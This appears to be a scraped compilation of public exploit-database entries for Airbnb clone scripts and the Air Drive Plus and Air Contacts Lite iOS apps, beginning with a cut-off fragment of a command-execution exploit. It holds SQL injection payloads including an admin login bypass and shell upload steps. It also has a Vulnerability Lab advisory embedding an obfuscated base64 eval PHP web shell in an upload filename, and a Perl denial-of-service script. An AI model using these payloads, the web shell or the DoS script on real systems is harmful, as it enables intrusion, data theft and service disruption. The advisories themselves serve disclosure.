res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)

print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)
HireHackking 
# # # # #
# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/airbnb-premium-clone-script/
# Demo: http://airbnb.clonedemo.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/page/1[SQL]
# http://localhost/[PATH]/view-rental/1/1[SQL]
# # # # #
HireHackking 
# Exploit Title: Homey BNB (Airbnb Clone Script) - Multiple SQL Injection
# Date: 27.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/
# Demo Site: http://sitedemos.in/homeybnb/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/rooms/ajax_refresh_subtotal
Vulnerable Parameter: hosting_id (GET)
Payload: checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--
DXVl&number_of_guests=1


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/admin/edit.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=if(now()=sysdate()%2Csleep(0)%2C0)


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/admin/cms_getpagetitle.php?catid=1
Vulnerable Parameter: catid (GET)
Payload: catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/admin/getcmsdata.php?pt=1
Vulnerable Parameter: pt (GET)
Payload: pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20

----- PoC 5: SQLi -----

Request: http://localhost/[PATH]/admin/getrecord.php?val=1
Vulnerable Parameter: val (GET)
Payload: val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20

----- PoC 6: SQLi (Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/admin/
Username: '=' 'or'
Password: '=' 'or'
HireHackking 
# # # # # 
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: Airbnb Clone Script
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/airbnb-clone/
# Script Name: Airbnb Clone Script
# Script Buy Now: http://www.hotscripts.com/listing/airbnb-clone-tibsolutions/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
#Register in site ... and login 
#Goto profil
#Empty file .htaccess and Shell.php...
#
HireHackking 
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597


Release Date:
=============
2015-09-21


Vulnerability Laboratory ID (VL-ID):
====================================
1597


Common Vulnerability Scoring System:
====================================
8.7


Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.

(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-09-21:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests 
or system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with 
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include 
execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload 
by usage of the wifi interface or local file sync function. 

Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious 
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. 

The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. 
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account. 
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Upload

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:8000/)


Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png


PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>


--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
      Host[localhost:8000:8000]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8000/index_files.html]
   POST-Daten:
      POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ...   ...   ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png

Status: 200[OK] 
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
      Host[localhost:8000]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8000/index_files.html]
 


Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://1localhost:8000/AirDriveAction_file_show/


Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
source: https://www.securityfocus.com/bid/61081/info

Air Drive Plus is prone to multiple input validation vulnerabilities including a local file-include vulnerability, an arbitrary file-upload vulnerability, and an HTML-injection vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, obtain sensitive information, execute arbitrary script code within the context of the browser, and steal cookie-based authentication credentials.

Air Drive Plus 2.4 is vulnerable; other versions may also be affected. 

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/;/private/var/mobile/Applications";>;/private/var/mobile/Applications/</a></td>
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center">
<a onclick="javascript:delfile("/private/var/mobile/Applications");" class="transparent_button">Delete</a></td></tr>

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/1337.png.gif.php.js.html";>1337.png.gif.php.js.html</a></td>
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a 
onclick="javascript:delfile("1337.png.gif.php.js.html");" 
class="transparent_button">Delete</a></td></tr>

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT 
INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center">
2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("[PERSISTENT INJECTED SCRIPT 
CODE!]1337.png");" class="transparent_button">Delete</a></td></tr>
HireHackking 
source: https://www.securityfocus.com/bid/46827/info

Air Contacts Lite is prone a denial-of-service vulnerability.

Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition. 

#!/usr/bin/perl
use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request...\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.example.com. HTTP/1.1\r\n";
      print $socket "Host: http://www.example.com.\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";

sub usage() {
      print "[-] example - Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
}